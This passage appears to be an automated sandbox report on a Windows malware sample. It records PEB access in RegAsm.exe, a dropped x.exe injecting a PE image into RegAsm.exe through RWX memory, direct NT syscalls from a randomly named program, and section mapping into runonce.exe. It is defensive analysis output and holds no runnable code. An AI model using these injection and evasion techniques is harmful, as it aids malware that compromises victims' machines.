Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 5_2_02D34AD0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 5_2_02D56ACC mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 5_2_02D56ACC mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 5_2_02D56ACC mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 5_2_02D3AAEE mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 5_2_02D3AAEE mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 5_2_02D38A90 mov edx, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 5_2_02D0EA80 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 5_2_02D0EA80 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 5_2_02D0EA80 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 5_2_02D0EA80 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 5_2_02D0EA80 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 5_2_02D0EA80 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 5_2_02D0EA80 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 5_2_02D0EA80 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 5_2_02D0EA80 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 5_2_02DD4A80 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 5_2_02D08AA0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 5_2_02D08AA0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 5_2_02D56AA4 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 5_2_02D06A50 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 5_2_02D06A50 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 5_2_02D06A50 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 5_2_02D06A50 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 5_2_02D06A50 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 5_2_02D06A50 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 5_2_02D06A50 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 5_2_02D10A5B mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 5_2_02D10A5B mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 5_2_02D7CA72 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 5_2_02D7CA72 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 5_2_02DAEA60 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 5_2_02D3CA6F mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 5_2_02D3CA6F mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 5_2_02D3CA6F mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 5_2_02D8CA11 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 5_2_02D24A35 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 5_2_02D24A35 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 5_2_02D3CA38 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 5_2_02D3CA24 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 5_2_02D2EA2E mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 5_2_02DAEBD0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 5_2_02D20BCB mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 5_2_02D20BCB mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 5_2_02D20BCB mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 5_2_02D00BCD mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 5_2_02D00BCD mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 5_2_02D00BCD mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 5_2_02D08BF0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 5_2_02D08BF0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 5_2_02D08BF0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 5_2_02D8CBF0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 5_2_02D2EBFC mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 5_2_02DB4BB0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 5_2_02DB4BB0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 5_2_02D10BBE mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 5_2_02D10BBE mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 5_2_02DAEB50 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 5_2_02DD2B57 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 5_2_02DD2B57 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 5_2_02DD2B57 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 5_2_02DD2B57 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 5_2_02DB4B4B mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 5_2_02DB4B4B mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 5_2_02DA8B42 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 5_2_02D96B40 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 5_2_02D96B40 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 5_2_02DCAB40 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 5_2_02CF8B50 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 5_2_02CFCB7E mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 5_2_02D7EB1D mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 5_2_02D7EB1D mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 5_2_02D7EB1D mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 5_2_02D7EB1D mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 5_2_02D7EB1D mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 5_2_02D7EB1D mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 5_2_02D7EB1D mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 5_2_02D7EB1D mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 5_2_02D7EB1D mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 5_2_02DD4B00 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 5_2_02D2EB20 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 5_2_02D2EB20 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 5_2_02DC8B28 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 5_2_02DC8B28 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 5_2_02D2E8C0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 5_2_02DD08C0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 5_2_02D3C8F9 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 5_2_02D3C8F9 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 5_2_02DCA8E4 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 5_2_02D8C89D mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 5_2_02D00887 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 5_2_02D30854 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 5_2_02D04859 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 5_2_02D04859 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 5_2_02D12840 mov ecx, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 5_2_02D96870 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 5_2_02D96870 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 5_2_02D8E872 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 5_2_02D8E872 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 5_2_02D8C810 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 5_2_02DA483A mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 5_2_02DA483A mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 5_2_02D3A830 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 5_2_02D22835 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 5_2_02D22835 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 5_2_02D22835 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 5_2_02D22835 mov ecx, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 5_2_02D22835 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 5_2_02D22835 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 5_2_02D0A9D0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 5_2_02D0A9D0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 5_2_02D0A9D0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 5_2_02D0A9D0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 5_2_02D0A9D0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 5_2_02D0A9D0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 5_2_02D349D0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 5_2_02DCA9D3 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 5_2_02D969C0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 5_2_02D329F9 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 5_2_02D329F9 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 5_2_02D8E9E0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 5_2_02D889B3 mov esi, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 5_2_02D889B3 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 5_2_02D889B3 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 5_2_02D129A0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 5_2_02D129A0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 5_2_02D129A0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 5_2_02D129A0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 5_2_02D129A0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 5_2_02D129A0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 5_2_02D129A0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 5_2_02D129A0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 5_2_02D129A0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 5_2_02D129A0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 5_2_02D129A0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 5_2_02D129A0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 5_2_02D129A0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 5_2_02D009AD mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 5_2_02D009AD mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 5_2_02DD4940 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 5_2_02D80946 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 5_2_02DA4978 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 5_2_02DA4978 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 5_2_02D8C97C mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 5_2_02D26962 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 5_2_02D26962 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\Temp\x.exe Memory allocated: page read and write | page guard

                HIPS / PFW / Operating System Protection Evasion

Source: C:\Users\user\AppData\Local\Temp\x.exe Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 protect: page execute and read and write
Source: C:\Program Files (x86)\UfdujJffCftgkWIRTClUOplhWXIVwQwqHslmKQeprsvFwt\y85te3vqfc6QGAKyw78l.exe NtProtectVirtualMemory: Direct from: 0x77542F9C
Source: C:\Program Files (x86)\UfdujJffCftgkWIRTClUOplhWXIVwQwqHslmKQeprsvFwt\y85te3vqfc6QGAKyw78l.exe NtSetInformationProcess: Direct from: 0x77542C5C
Source: C:\Program Files (x86)\UfdujJffCftgkWIRTClUOplhWXIVwQwqHslmKQeprsvFwt\y85te3vqfc6QGAKyw78l.exe NtOpenKeyEx: Direct from: 0x77542B9C
Source: C:\Program Files (x86)\UfdujJffCftgkWIRTClUOplhWXIVwQwqHslmKQeprsvFwt\y85te3vqfc6QGAKyw78l.exe NtProtectVirtualMemory: Direct from: 0x77537B2E
Source: C:\Program Files (x86)\UfdujJffCftgkWIRTClUOplhWXIVwQwqHslmKQeprsvFwt\y85te3vqfc6QGAKyw78l.exe NtCreateFile: Direct from: 0x77542FEC
Source: C:\Program Files (x86)\UfdujJffCftgkWIRTClUOplhWXIVwQwqHslmKQeprsvFwt\y85te3vqfc6QGAKyw78l.exe NtOpenFile: Direct from: 0x77542DCC
Source: C:\Program Files (x86)\UfdujJffCftgkWIRTClUOplhWXIVwQwqHslmKQeprsvFwt\y85te3vqfc6QGAKyw78l.exe NtQueryInformationToken: Direct from: 0x77542CAC
Source: C:\Program Files (x86)\UfdujJffCftgkWIRTClUOplhWXIVwQwqHslmKQeprsvFwt\y85te3vqfc6QGAKyw78l.exe NtTerminateThread: Direct from: 0x77542FCC
Source: C:\Program Files (x86)\UfdujJffCftgkWIRTClUOplhWXIVwQwqHslmKQeprsvFwt\y85te3vqfc6QGAKyw78l.exe NtDeviceIoControlFile: Direct from: 0x77542AEC
Source: C:\Program Files (x86)\UfdujJffCftgkWIRTClUOplhWXIVwQwqHslmKQeprsvFwt\y85te3vqfc6QGAKyw78l.exe NtAllocateVirtualMemory: Direct from: 0x77542BEC
Source: C:\Program Files (x86)\UfdujJffCftgkWIRTClUOplhWXIVwQwqHslmKQeprsvFwt\y85te3vqfc6QGAKyw78l.exe NtQueryVolumeInformationFile: Direct from: 0x77542F2C
Source: C:\Program Files (x86)\UfdujJffCftgkWIRTClUOplhWXIVwQwqHslmKQeprsvFwt\y85te3vqfc6QGAKyw78l.exe NtOpenSection: Direct from: 0x77542E0C
Source: C:\Program Files (x86)\UfdujJffCftgkWIRTClUOplhWXIVwQwqHslmKQeprsvFwt\y85te3vqfc6QGAKyw78l.exe NtAllocateVirtualMemory: Direct from: 0x775448EC
Source: C:\Program Files (x86)\UfdujJffCftgkWIRTClUOplhWXIVwQwqHslmKQeprsvFwt\y85te3vqfc6QGAKyw78l.exe NtSetInformationThread: Direct from: 0x775363F9
Source: C:\Program Files (x86)\UfdujJffCftgkWIRTClUOplhWXIVwQwqHslmKQeprsvFwt\y85te3vqfc6QGAKyw78l.exe NtQuerySystemInformation: Direct from: 0x775448CC
Source: C:\Program Files (x86)\UfdujJffCftgkWIRTClUOplhWXIVwQwqHslmKQeprsvFwt\y85te3vqfc6QGAKyw78l.exe NtClose: Direct from: 0x77542B6C
Source: C:\Program Files (x86)\UfdujJffCftgkWIRTClUOplhWXIVwQwqHslmKQeprsvFwt\y85te3vqfc6QGAKyw78l.exe NtReadVirtualMemory: Direct from: 0x77542E8C
Source: C:\Program Files (x86)\UfdujJffCftgkWIRTClUOplhWXIVwQwqHslmKQeprsvFwt\y85te3vqfc6QGAKyw78l.exe NtCreateKey: Direct from: 0x77542C6C
Source: C:\Program Files (x86)\UfdujJffCftgkWIRTClUOplhWXIVwQwqHslmKQeprsvFwt\y85te3vqfc6QGAKyw78l.exe NtSetInformationThread: Direct from: 0x77542B4C
Source: C:\Program Files (x86)\UfdujJffCftgkWIRTClUOplhWXIVwQwqHslmKQeprsvFwt\y85te3vqfc6QGAKyw78l.exe NtQueryAttributesFile: Direct from: 0x77542E6C
Source: C:\Program Files (x86)\UfdujJffCftgkWIRTClUOplhWXIVwQwqHslmKQeprsvFwt\y85te3vqfc6QGAKyw78l.exe NtAllocateVirtualMemory: Direct from: 0x77543C9C
Source: C:\Program Files (x86)\UfdujJffCftgkWIRTClUOplhWXIVwQwqHslmKQeprsvFwt\y85te3vqfc6QGAKyw78l.exe NtCreateUserProcess: Direct from: 0x7754371C
Source: C:\Program Files (x86)\UfdujJffCftgkWIRTClUOplhWXIVwQwqHslmKQeprsvFwt\y85te3vqfc6QGAKyw78l.exe NtQueryInformationProcess: Direct from: 0x77542C26
Source: C:\Program Files (x86)\UfdujJffCftgkWIRTClUOplhWXIVwQwqHslmKQeprsvFwt\y85te3vqfc6QGAKyw78l.exe NtResumeThread: Direct from: 0x77542FBC
Source: C:\Program Files (x86)\UfdujJffCftgkWIRTClUOplhWXIVwQwqHslmKQeprsvFwt\y85te3vqfc6QGAKyw78l.exe NtWriteVirtualMemory: Direct from: 0x7754490C
Source: C:\Program Files (x86)\UfdujJffCftgkWIRTClUOplhWXIVwQwqHslmKQeprsvFwt\y85te3vqfc6QGAKyw78l.exe NtDelayExecution: Direct from: 0x77542DDC
Source: C:\Program Files (x86)\UfdujJffCftgkWIRTClUOplhWXIVwQwqHslmKQeprsvFwt\y85te3vqfc6QGAKyw78l.exe NtAllocateVirtualMemory: Direct from: 0x77542BFC
Source: C:\Program Files (x86)\UfdujJffCftgkWIRTClUOplhWXIVwQwqHslmKQeprsvFwt\y85te3vqfc6QGAKyw78l.exe NtReadFile: Direct from: 0x77542ADC
Source: C:\Program Files (x86)\UfdujJffCftgkWIRTClUOplhWXIVwQwqHslmKQeprsvFwt\y85te3vqfc6QGAKyw78l.exe NtQuerySystemInformation: Direct from: 0x77542DFC
Source: C:\Program Files (x86)\UfdujJffCftgkWIRTClUOplhWXIVwQwqHslmKQeprsvFwt\y85te3vqfc6QGAKyw78l.exe NtResumeThread: Direct from: 0x775436AC
Source: C:\Program Files (x86)\UfdujJffCftgkWIRTClUOplhWXIVwQwqHslmKQeprsvFwt\y85te3vqfc6QGAKyw78l.exe NtNotifyChangeKey: Direct from: 0x77543C2C
Source: C:\Program Files (x86)\UfdujJffCftgkWIRTClUOplhWXIVwQwqHslmKQeprsvFwt\y85te3vqfc6QGAKyw78l.exe NtCreateMutant: Direct from: 0x775435CC
Source: C:\Program Files (x86)\UfdujJffCftgkWIRTClUOplhWXIVwQwqHslmKQeprsvFwt\y85te3vqfc6QGAKyw78l.exe NtWriteVirtualMemory: Direct from: 0x77542E3C
Source: C:\Program Files (x86)\UfdujJffCftgkWIRTClUOplhWXIVwQwqHslmKQeprsvFwt\y85te3vqfc6QGAKyw78l.exe NtMapViewOfSection: Direct from: 0x77542D1C
Source: C:\Users\user\AppData\Local\Temp\x.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 value starts with: 4D5A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: NULL target: C:\Program Files (x86)\UfdujJffCftgkWIRTClUOplhWXIVwQwqHslmKQeprsvFwt\y85te3vqfc6QGAKyw78l.exe protection: execute and read and write
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: NULL target: C:\Windows\SysWOW64\runonce.exe protection: execute and read and write
Source: C:\Windows\SysWOW64\runonce.exe Section loaded: NULL target: C:\Program Files (x86)\UfdujJffCftgkWIRTClUOplhWXIVwQwqHslmKQeprsvFwt\y85te3vqfc6QGAKyw78l.exe protection: read write
Source: C:\Windows\SysWOW64\runonce.exe Section loaded: NULL target: C:\Program Files (x86)\UfdujJffCftgkWIRTClUOplhWXIVwQwqHslmKQeprsvFwt\y85te3vqfc6QGAKyw78l.exe protection: execute and read and write
